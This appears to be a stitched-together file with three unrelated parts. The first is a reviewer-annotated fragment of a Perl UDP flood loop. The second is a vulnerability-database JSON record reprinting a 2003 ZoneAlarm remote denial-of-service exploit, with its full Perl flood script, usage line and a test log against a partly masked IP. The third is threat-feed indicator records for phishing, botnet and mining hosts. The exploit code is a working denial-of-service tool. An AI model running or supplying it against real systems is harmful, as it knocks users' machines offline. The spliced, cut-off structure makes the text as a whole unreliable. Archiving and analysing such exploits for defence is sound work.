# Status banner. The loop that follows has no exit condition, so the script
# keeps sending until the process is interrupted.
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
# Send loop: one UDP send() per pass, each to a freshly drawn destination port.
# For detection, the traffic shape is a sustained stream of very small UDP
# datagrams from one sender, spread across destination ports 1..65000.
for (;;) {
# NOTE(review): no assignment to $rand appears in this listing. If it is unset,
# every "x" repetition collapses to the empty string and $size stays "".
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
# int(rand 65000) yields 0..64999, so the port is in 1..65000 (never 0, never
# 65001..65535).
$port=int(rand 65000) +1;
# Perl's send() takes (SOCKET, MSG, FLAGS, TO). As written, MSG is the literal 0
# and $size is passed in the FLAGS position, so each datagram carries the
# one-character payload "0". The return value is not checked, so failed sends
# go unnoticed. The DoS handle and $iaddr are set up outside this excerpt.
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
# Emit the invocation synopsis and terminate the script through die().
# The message ends in a newline, so Perl appends no file/line suffix to it.
sub usage {
    my $synopsis = "\n\n[*] Usage : perl $0 <Target>\n\n";
    die($synopsis);
}
{"id": "SECURITYVULNS:DOC:5044", "bulletinFamily": "software", "title": "ZoneAlarm remote Denial Of Service exploit", "description": "\r\n\r\n# Overview : \r\n#\r\n# ZoneAlarm is a firewall software\r\n# package designed for Microsoft Windows \r\n# operating systems that blocks intrusion \r\n# attempts, trusted by millions, and has \r\n# advanced privacy features like worms, \r\n# Trojan horses, and spyware protection. \r\n# ZoneAlarm is distributed and maintained \r\n# by Zone Labs.http://www.zonelabs.com\r\n#\r\n# Details :\r\n#\r\n# ZoneAlarm was found vulnerable to a\r\n# serious vulnerability leading to a\r\n# remote Denial Of Service condition due \r\n# to failure to handle udp random \r\n# packets, if an attacker sends multiple \r\n# udp packets to multiple ports 0-65000, \r\n# the machine will hang up until the\r\n# attacker stop flooding. \r\n#\r\n# The following is a remote test done \r\n# under ZoneAlarm version 3.7.202 running \r\n# on windows xp home edition.\r\n#\r\n# on irc test1 joined running ZoneAlarm\r\n# version 3.7.202 with default\r\n# installation\r\n#\r\n# * test1 (test@62.251.***.**) has joined #Hackology\r\n#\r\n# from a linux box :\r\n#\r\n# [root@mail DoS]# ping 62.251.***.**\r\n# PING 62.251.***.** (62.251.***.**) from \r\n# ***.***.**.** : 56(84) bytes of data.\r\n#\r\n# --- 62.251.***.** ping statistics ---\r\n# 7 packets transmitted, 0 received, 100% \r\n# loss, time 6017ms\r\n#\r\n# on irc\r\n#\r\n# -> [test1] PING\r\n#\r\n# [test1 PING reply]: 1secs\r\n#\r\n# Host is firewalled and up\r\n#\r\n# now lets try to dos\r\n#\r\n# --- ZoneAlarm Remote DoS Xploit\r\n# ---\r\n# --- Discovered & Coded By _6mO_HaCk\r\n#\r\n# [*] DoSing 62.251.***.** ... 
wait 1\r\n# minute and then CTRL+C to stop\r\n#\r\n# [root@mail DoS]#\r\n#\r\n# after 2 minutes\r\n#\r\n# * test1 (test@62.251.***.**) Quit (Ping timeout)\r\n#\r\n# I have made the same test on ZoneAlarm \r\n# Pro 4.0 Release running on windows xp\r\n# professional and i've got the same \r\n# result.\r\n#\r\n# Exploit released : 02/09/03\r\n#\r\n# Vulnerable Versions : ALL\r\n#\r\n# Operating Systems : ALL Windows\r\n#\r\n# Successfully Tested on :\r\n#\r\n# ZoneAlarm version 3.7.202 / windows xp \r\n# home edition / windows 98.\r\n#\r\n# ZoneAlarm Pro 4.0 Release / windows xp \r\n# professional\r\n#\r\n# Vendor status : UNKOWN\r\n#\r\n# Solution : Shut down ZoneAlarm and wait \r\n# for an update.\r\n#\r\n# The following is a simple code written \r\n# in perl to demonstrate that, the code \r\n# is clean, it wont eat your cpu usage\r\n# and it doesnt need to be run as root \r\n# but you still have to use it at your\r\n# own risk and on your own machine or\r\n# remotly after you get permission.\r\n#\r\n# Big thanx go to D|NOOO and frost for \r\n# providing me windows boxes with\r\n# zonealarm for testing\r\n#\r\n# Greetz to ir7ioli, BlooDMASK\r\n# Abderrahman@zone-h.org\r\n# NRGY, Le_Ro| JT ghosted_ Securma,\r\n# anasoft SySiPh, phrack, DeV|L0Ty, \r\n# MajNouN |BiG-LuV| h4ckg1rl and all \r\n# my ppl here in Chicago and in Morocco\r\n#\r\n# Comments suggestions or additional info \r\n# feel free to contact me at\r\n# simo@benyoussef.org\r\n# _6mO_HaCk@linuxmail.org\r\n\r\n#!/usr/bin/perl\r\nuse Socket;\r\n\r\nsystem(clear);\r\nprint "\n";\r\nprint "--- ZoneAlarm Remote DoS Xploit\n";\r\nprint "---\n";\r\nprint "--- Discovered & Coded By _6mO_HaCk\n";\r\nprint "\n";\r\nif(!defined($ARGV[0]))\r\n{\r\n &usage\r\n}\r\n\r\nmy ($target);\r\n $target=$ARGV[0];\r\n\r\nmy $ia = inet_aton($target) || die ("[-] Unable to resolve \r\n$target");\r\n\r\nsocket(DoS, PF_INET, SOCK_DGRAM, 17);\r\n $iaddr = inet_aton("$target");\r\n\r\nprint "[*] DoSing $target ... 
wait 1 minute and then CTRL+C to stop\n";\r\n\r\nfor (;;) {\r\n $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x\r\n$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x\r\n$rand x $rand;\r\n $port=int(rand 65000) +1;\r\n send(DoS, 0, $size, sockaddr_in($port, $iaddr));\r\n}\r\nsub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}\r\n\r\n", "published": "2003-09-03T00:00:00", "modified": "2003-09-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5044", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:08", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2018-08-31T11:10:08", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813663", "OPENVAS:1361412562311220201398", "OPENVAS:1361412562310813666", "OPENVAS:1361412562310813665", "OPENVAS:1361412562310813672", "OPENVAS:1361412562310813670"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1398.NASL", "ADOBE_ACROBAT_APSB18-21.NASL", "NEWSTART_CGSL_NS-SA-2019-0233_GCC.NASL"]}, {"type": "cve", "idList": ["CVE-2014-2595", "CVE-2015-9286", "CVE-2018-5044", "CVE-2008-7273", "CVE-2019-5044", "CVE-2008-7272"]}, {"type": "talos", "idList": ["TALOS-2019-0811"]}, {"type": "kitploit", "idList": ["KITPLOIT:8249941423348208298", "KITPLOIT:7666822453544838142"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:CDAE18779D798AF24649FFD6CD8A99D6"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:45477ECD0A0F60BA46719A3A87A0DB53"]}], "modified": "2018-08-31T11:10:08", "rev": 2}, "vulnersScore": 5.5}, "affectedSoftware": [], "immutableFields": []}
{"rst": [{"lastseen": "2021-04-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **harmarena[.]work** in [RST Threat Feed](https://rstcloud.net/profeed) with score **7**.\n First seen: 2020-10-22T03:00:00, Last seen: 2021-04-17T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 45[.]80.175.70\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-10-22T00:00:00", "id": "RST:18888CE9-5044-352A-BCD8-8E9D7DD4CDE6", "href": "", "published": "2021-04-18T00:00:00", "title": "RST Threat feed. IOC: harmarena.work", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **94[.]75.253.85** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-04-12T03:00:00.\n IOC tags: **generic**.\nASN 60781: (First IP 94.75.197.0, Last IP 94.75.255.255).\nASN Name \"LEASEWEBNLAMS01\" and Organisation \"Netherlands\".\nThis IP is a part of \"**leaseweb**\" address pools.\nASN hosts 576829 domains.\nGEO IP information: City \"\", Country \"Netherlands\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:2D40CEAA-5044-3F83-B3BA-CA08CB1CCEE5", "href": "", "published": "2021-04-14T00:00:00", "title": "RST Threat feed. 
IOC: 94.75.253.85", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-08T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **182[.]182.88.128** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-04-08T03:00:00, Last seen: 2021-04-08T03:00:00.\n IOC tags: **generic**.\nASN 17557: (First IP 182.180.176.0, Last IP 182.183.255.255).\nASN Name \"PKTELECOMASPK\" and Organisation \"Pakistan Telecommunication Company Limited\".\nASN hosts 538 domains.\nGEO IP information: City \"Hyderabad\", Country \"Pakistan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-08T00:00:00", "id": "RST:B56D05C7-5044-37E2-944A-785633862622", "href": "", "published": "2021-04-08T00:00:00", "title": "RST Threat feed. IOC: 182.182.88.128", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-02T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **gruppqsex54[.]myq-see.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2021-04-02T03:00:00, Last seen: 2021-04-02T03:00:00.\n IOC tags: **phishing**.\nWhois:\n Created: 2009-04-30 19:29:52, \n Registrar: unknown, \n Registrant: Network Solutions LLC.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-02T00:00:00", "id": "RST:3705ABD8-5044-3546-827F-8B332B6EEE57", "href": "", "published": "2021-04-03T00:00:00", "title": "RST Threat feed. 
IOC: gruppqsex54.myq-see.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-31T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **https://bsdsv-trfgt-yhnbv[.]s3-eu-west-1.amazonaws.com/index.html** in [RST Threat Feed](https://rstcloud.net/profeed) with score **59**.\n First seen: 2021-03-31T03:00:00, Last seen: 2021-03-31T03:00:00.\n IOC tags: **phishing**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-31T00:00:00", "id": "RST:FA1C8A76-5044-34D6-BE78-1C36CCD8438B", "href": "", "published": "2021-04-01T00:00:00", "title": "RST Threat feed. IOC: https://bsdsv-trfgt-yhnbv.s3-eu-west-1.amazonaws.com/index.html", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **102[.]130.24.92** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **6**.\n First seen: 2020-06-16T03:00:00, Last seen: 2021-03-10T03:00:00.\n IOC tags: **botnet, generic**.\nWe found that the IOC is used by: **mirai**.\nASN 328388: (First IP 102.130.16.0, Last IP 102.130.31.255).\nASN Name \"AS328388\" and Organisation \"\".\nASN hosts 23 domains.\nGEO IP information: City \"Bethlehem\", Country \"South Africa\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-16T00:00:00", "id": "RST:58D8D09D-5044-368D-A2DC-59503A151950", "href": "", "published": "2021-03-24T00:00:00", "title": "RST Threat feed. 
IOC: 102.130.24.92", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **52[.]37.172.19** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 16509: (First IP 52.24.0.0, Last IP 52.43.255.255).\nASN Name \"AMAZON02\" and Organisation \"Amazoncom Inc\".\nThis IP is a part of \"**amazon_cloud_ec2**\" address pools.\nASN hosts 14742129 domains.\nGEO IP information: City \"\", Country \"United States\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-05T00:00:00", "id": "RST:8D6DD10E-5044-3904-B320-293762C2475B", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 52.37.172.19", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **owa[.]minerpool.net** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-01-10T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-01-10T00:00:00", "id": "RST:D2DB86C5-5044-35CE-9121-15493E1F08BE", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: owa.minerpool.net", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **cthome[.]evolution-project.go.ro** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-08-04T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. 
Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-04T00:00:00", "id": "RST:AB0553F8-5044-34E6-B7CF-5F76B3F2F46E", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: cthome.evolution-project.go.ro", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **daggerhashimoto-test[.]usa.api.nicehash.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-17T00:00:00", "id": "RST:8368F50D-5044-3C8B-B960-0E3FFED954D0", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: daggerhashimoto-test.usa.api.nicehash.com", "type": "rst", "cvss": {}}]}